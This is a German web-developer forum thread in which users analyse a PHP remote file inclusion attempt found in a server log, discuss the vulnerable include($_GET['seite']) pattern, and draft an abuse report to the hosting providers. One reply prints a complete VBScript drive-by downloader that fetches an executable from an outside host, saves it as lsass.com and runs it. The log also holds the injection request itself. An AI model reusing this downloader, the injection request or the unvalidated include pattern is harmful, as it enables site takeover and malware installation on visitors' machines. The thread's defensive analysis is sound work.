Powl: Hackerangriff?

Hallo,

in einem Serverlog habe ich gefinden, dass jemand versucht hat mit folgendem Aufruf:
GET /index.php?seite=http://rms2.ifrance.com/safe.txt??
ein Skript ausführen zu lassen.
Den Skriptquelltext kann man unter http://rms2.ifrance.com/safe.txt?? [absichtlich _nicht_ verlinkt] aufrufen.
Hat jemand eine Idee, was dieses Skript bezwecken soll? Ich werde daraus nicht schlau.

Genutzt hat's jedenfalls nichts: Isch 'abe gar keine index.php :D und selbst wenn würde ich so plumpes Vorgehen nicht zulassen. Dennoch würde es mich interessieren, was da eigentlich versucht wurde.

netten Tag
^da Powl

--
===============================
powl.hat-gar-keine-homepage.de/
  1. Hallo Powl,

    GET /index.php?seite=http://rms2.ifrance.com/safe.txt??
    Hat jemand eine Idee, was dieses Skript bezwecken soll? Ich werde daraus nicht schlau.

    Naja, es wird gehofft, dass du einfach include($_REQUEST['seite']) machst und damit den ganzen PHP-Code ausführst.
    Schau dir einfach mal die Textdatei an und lies dir durch, was passieren würde (besonders die letzten Zeilen sind spannend). Vermutlich hättest du nachher nur noch Werbung auf deiner Seite :)

    Grüße
      David

    --
    >>Nobody will ever need more than 640k RAM!<<
    1981 Bill Gates
    1. Hallo,

      Danke für Eure Antworten. So einen *** hatte ich schon vermutet. Wenn ich die IP von dem *** in den Browser eingebe, erscheint eine Seite mit der Mitteilung der Apache wäre erfolgreich installiert. Dem entnehme ich, der *** hat einen eigenen Server laufen, so daß man ihm über seinen Provider wohl kaum beikommen kann?
      Vermutlich gibt es keine Möglichkeit dagegen vorzugehen, oder?

      netten Tag
      ^da Powl

      --
      ===============================
      powl.hat-gar-keine-homepage.de/
      1. Moin!

        Danke für Eure Antworten. So einen *** hatte ich schon vermutet. Wenn ich die IP von dem *** in den Browser eingebe, erscheint eine Seite mit der Mitteilung der Apache wäre erfolgreich installiert. Dem entnehme ich, der *** hat einen eigenen Server laufen, so daß man ihm über seinen Provider wohl kaum beikommen kann?
        Vermutlich gibt es keine Möglichkeit dagegen vorzugehen, oder?

        Mach einen Whois auf die IP, dann kriegst du raus, bei welchem Provider der sitzt. Wenn das in deinem eigenen Land (Deutschland?) ist, dann sichere die Beweise (eingebundene Datei zippen, Logfile zippen, alles auch nochmal ausdrucken) und erstatte Anzeige bei der Polizei.

        Die Domain mit dem bösen Skript ist jedenfalls in Frankreich. Dorthin vorzugehen dürfte schwieriger sein (wenn auch nicht unmöglich, ist ja schließlich Europäische Union).

        - Sven Rautenberg

        --
        "Love your nation - respect the others."
        1. Hallo Sven,

          Danke für den Tipp. Die IP von der der Zugriff stammt ist leider aus USA, genauer PA. Allerdings ist dor ein IP Bereich angegeben und eine E-Mail Adresse: RTechEmail ***
          Ob es Zweck hätte sich bei dieser Adresse zu beschweren?

          netten Tag
          ^da Powl

          --
          ===============================
          powl.hat-gar-keine-homepage.de/
          1. Moin!

            Danke für den Tipp. Die IP von der der Zugriff stammt ist leider aus USA, genauer PA. Allerdings ist dor ein IP Bereich angegeben und eine E-Mail Adresse: RTechEmail ***
            Ob es Zweck hätte sich bei dieser Adresse zu beschweren?

            Das mußt du entscheiden. Ich vermute mal: Eher nein. Aber wie man an Patricks Nachricht sieht, kann es sich unerwartet durchaus doch lohnen.

            - Sven Rautenberg

            --
            "Love your nation - respect the others."
            1. Hallo,

              Ich habe mich zu der E-Maillösung entschieden. Vorerst. Den Text poste ich im Anschluss, wobei es mir auffällt: Schade, dass es keinen spoiler gibt.
              Vielleicht kann der Text ja bei ähnlichen Vorkommnissen helfen. Nur schade, dass ich kein Französisch kann.

              Bin gespannt, ob's was nutzt. Sollte sich da etwas ergeben, teile ich es hier mit. Vielleicht müsste man diese *** viel konsequenter 'abschiessen'.

              Vielen Dank nochmal an alle für die Unterstützung.

              netten Tag
              ^da Powl
              ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

              Dear ladies and gentleman,

              an overview of the server logfiles generated by my website led me to the following entries:

              [IP von hostnoc.net] - - [11/Sep/2007:16:17:11 +0200] "GET /index.php?seite=http://rms2.ifrance.com/safe.txt?? HTTP/1.1" 404 1950 "-" "libwww-perl/5.808"
              ...

              Therefore I looked up the URL http://rms2.ifrance.com/safe.txt and found a script which, by sitesteps, tries to install a trojan named Win32.Rbot.dvd.
              This trojan would be installed by flash7.exe, which can be invoked by another (VB) script. In case the script might be meanwhile erased, I add the sourcecode of the scripts to this mail. (badscript.txt)
              The 2nd script  is hosted at http://usuarios.arnet.com.ar/alvarezluque/morgan.html and tries to install the trojan by the latter quoted sourcecode:
              (You should not visit this link without appropriate security measure!)

              Although I am not well informed about the laws in USA nor France I presume hacking attempts like this are as well illegal as they are in Germany.
              This made me look up the whois of hostnoc.net,  rms2.ifrance.com and arnet.com where I found your e-mail adresses.
              I am writing in order to inform you about this illegal approach which is performed through your domains. I hope it will encourage you to take the necessary steps to prevent further fraudulent use of your online service. I doubt methods like this are of your interest because they might cause much as well affect your reputation.
              I am looking forward for your response, weather this mail was send to the concerning recipients. If I was mistaken about the e-mail adresses, may be you can advice me whom else to apply to?
              If I will not recieve an anwser in about one week, I plan to apply to the local police to file charges about this case. The necessary evidance I have saved. If you need further information about this case, I will give over everything necessary to help you stopping this fraud.

              with kind regards
              mein Name
              Germany

              P.S.

              Sourcecode of http://usuarios.arnet.com.ar/alvarezluque/morgan.html:
              [... eben dieses ...]

              Anhang Quelltext von  http://rms2.ifrance.com/safe.txt

              --
              ===============================
              powl.hat-gar-keine-homepage.de/
              1. Tach,

                wobei es mir auffällt: Schade, dass es keinen spoiler gibt.

                um Spoiler zu vermeiden ist hier die Nutzung von ROT13 möglich:

                [rot13]Dieser Text ist vercaesart.[/rot13]

                Im Archiv steht er dafür wieder im Klartext da.

                mfg
                Woodfighter

    2. Moin!

      Schau dir einfach mal die Textdatei an und lies dir durch, was passieren würde (besonders die letzten Zeilen sind spannend). Vermutlich hättest du nachher nur noch Werbung auf deiner Seite :)

      Werbung ist doch noch harmlos. Auf die Art und Weise eingebundene Skripte führen fremden Code auf dem eigenen Server/Webspace aus und man munkelt, dass da u.a. auch Remoteshells dabei sein sollen.

      Viele Grüße,
      Robert

    3. Hi,

      Schau dir einfach mal die Textdatei an und lies dir durch, was passieren würde (besonders die letzten Zeilen sind spannend). Vermutlich hättest du nachher nur noch Werbung auf deiner Seite :)

      Iwo - jeder Besucher, der diese seiten dann mit dem IE und aktiviertem Javascript aufriefe, könnte sich den Trojaner "Win32.Rbot.dvd" (meldet Kaspersky - Sasser?) einfangen.

      Das VBScript im iframe generiert dann nämlich folgendes Script:

      <script language="VBScript">  
      on error resume next  
        
      dl = "http://usuarios.arnet.com.ar/alvarezluque/flash7.exe"  
      Set df = document.createElement("object")  
      df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"  
      Set x = df.CreateObject("Microsoft.XMLHTTP","")  
      set S = df.createobject("Adodb.Stream","")  
      S.type = 1  
      str6="GET"  
      x.Open str6, dl, False  
      x.Send  
      ' Get temp directory and create our destination name  
      fname1="lsass.com"  
      set F = df.createobject("Scripting.FileSystemObject","")  
      set tmp = F.GetSpecialFolder(2) ' Get tmp folder  
      fname1= F.BuildPath(tmp,fname1)  
      S.open  
      S.write x.responseBody  
      S.savetofile fname1,2  
      S.close  
      set Q = df.createobject("Shell.Application","")  
      Q.ShellExecute fname1,"","","open",0  
      </script>
      

      (Einfach und ungefährlich herauszubekommen, indem man um document.write s noch eine textarea schreiben läßt.)

      Die flash7.exe sollte niemand ohne aktuellen Virenschutz auch in anderen browsern aufrufen!

      freundliche Grüße
      Ingo

    4. hallo David,

      es wird gehofft, dass du einfach include($_REQUEST['seite']) machst

      Ups. Sowas gibt es zwar bei _mir_ nicht, aber wenn ich mich korrekt erinnere, ist genau sowas (wenn auch nicht mit include, sondern mit "if exists") in der Zitatesammlung vorhanden.

      Da sollte sicherheitshalber mal jemand nachschauen, der sich damit auskennt.

      Grüße aus Berlin

      Christoph S.

      --
      Visitenkarte
      ss:| zu:) ls:& fo:) va:) sh:| rl:|
      1. hallo Christoph,

        Ups. Sowas gibt es zwar bei _mir_ nicht, aber wenn ich mich korrekt erinnere, ist genau sowas (wenn auch nicht mit include, sondern mit "if exists") in der Zitatesammlung vorhanden.

        Ich kann dort nichts derartiges entdecken. Ich bezweifle aber auch, dass unseren Zitatesammlungsprogrammierern solch offensichtliche und seit langem bekannte Fehler unterlaufen.

        Gruß,

        Johannes

        1. hallo Johannes,

          Ich kann dort nichts derartiges entdecken.

          Doch, _ungefähr_ so etwas gibt es. Du kannst beispielsweise http://community.de.selfhtml.org/my/zitatesammlung/seite11 aufrufen. Das wird zwar vom Script über ein paar Zwischenschritte so zusammengebastelt, aber genau diese Angaben wurden vereinbart, weil wir "schöne" URLs haben wollten. Und das heißt, den Übergabeparameter "seite" gibt es.

          Ich bezweifle aber auch, dass unseren Zitatesammlungsprogrammierern solch offensichtliche und seit langem bekannte Fehler unterlaufen.

          Naja, in "offensichtlicher" Form haben wir vermutlich keine gravierenden Fehler gemacht. Ich weiß auch nicht, wie der aktuelle Stand ist, aber schließlich habe ich das selber mal gebastelt, zusammen mit Alexander, und unter Christians Begleitung. Allerdings komme ich jetzt nicht an die Sourcen, die liegen auf einer Platte, die ich Augenblick ausgebaut habe.

          Grüße aus Berlin

          Christoph S.

          --
          Visitenkarte
          ss:| zu:) ls:& fo:) va:) sh:| rl:|
          1. Hallo Christoph,

            Doch, _ungefähr_ so etwas gibt es. Du kannst beispielsweise http://community.de.selfhtml.org/my/zitatesammlung/seite11 aufrufen. Das wird zwar vom Script über ein paar Zwischenschritte so zusammengebastelt, aber genau diese Angaben wurden vereinbart, weil wir "schöne" URLs haben wollten. Und das heißt, den Übergabeparameter "seite" gibt es.

            Auch nichts, was ungefähr so wäre. Es wird nicht einmal ein Parameter 'seite' verwendet, http://community.de.selfhtml.org/zitatesammlung/seite11 wird inter nach http://community.de.selfhtml.org/zitatesammlung/index.php?blatt=11 weitergeleitet. Unabhängig davon, dass der Parameter zufällig einen anderen Namen als 'seite' hat, besteht aber keine Gefährdung, da das Zitatesammlung-Programm nicht solchen Bödsinn macht, wie unvalidierte GET-Parameter als Namen von einzubindenden Dateien zu betrachtetn.

            Naja, in "offensichtlicher" Form haben wir vermutlich keine gravierenden Fehler gemacht. Ich weiß auch nicht, wie der aktuelle Stand ist, aber schließlich habe ich das selber mal gebastelt, zusammen mit Alexander, und unter Christians Begleitung. Allerdings komme ich jetzt nicht an die Sourcen, die liegen auf einer Platte, die ich Augenblick ausgebaut habe.

            Nichts gegen dich und Alexander, aber alleine schon weil Christian bei der Entwicklung dabei war, war ich mir schon, ohne den Quellcode angeguckt zu haben, sicher, dass die Zitatesammlung nicht auf diese Art und Weise angreifbar ist.

            Schöne Grüße,

            Johannes

            1. hallo Johannes,

              da das Zitatesammlung-Programm nicht solchen Bödsinn macht, wie unvalidierte GET-Parameter als Namen von einzubindenden Dateien zu betrachtetn.

              Na gut, also "solchen" Blödsinn hätten wir tatsächlich nie gemacht - auch ohne Christian.

              Grüße aus Berlin

              Christoph S.

              --
              Visitenkarte
              ss:| zu:) ls:& fo:) va:) sh:| rl:|
  2. Hi,

    Genutzt hat's jedenfalls nichts: Isch 'abe gar keine index.php :D und selbst wenn würde ich so plumpes Vorgehen nicht zulassen. Dennoch würde es mich interessieren, was da eigentlich versucht wurde.

    Code-Injection. Betroffen wäre eine unsichere index.php, die als GET-Parameter "seite"
    einen Dateinamen erwartet und dann z.B. über

    include($_GET['seite']);

    diese Datei ungeprüft einbindet. Ist jetzt auch noch allow_url_fopen angeschaltet,
    hätte man ein echtes Problem. Hab die Datei mal überflogen. Neben der Ausgabe einiger
    Informationen bügelt das Script durch document_root und ersetzt den Inhalt sämtlicher
    .php, .htm und .html Dateien durch ein iframe (URL kann man ja selbst nachschauen).
    Tja, und damit hätte man auf all seinen Seiten plötzlich dieses iframe und die
    eigenen Inhalte sind gelöscht.

    LG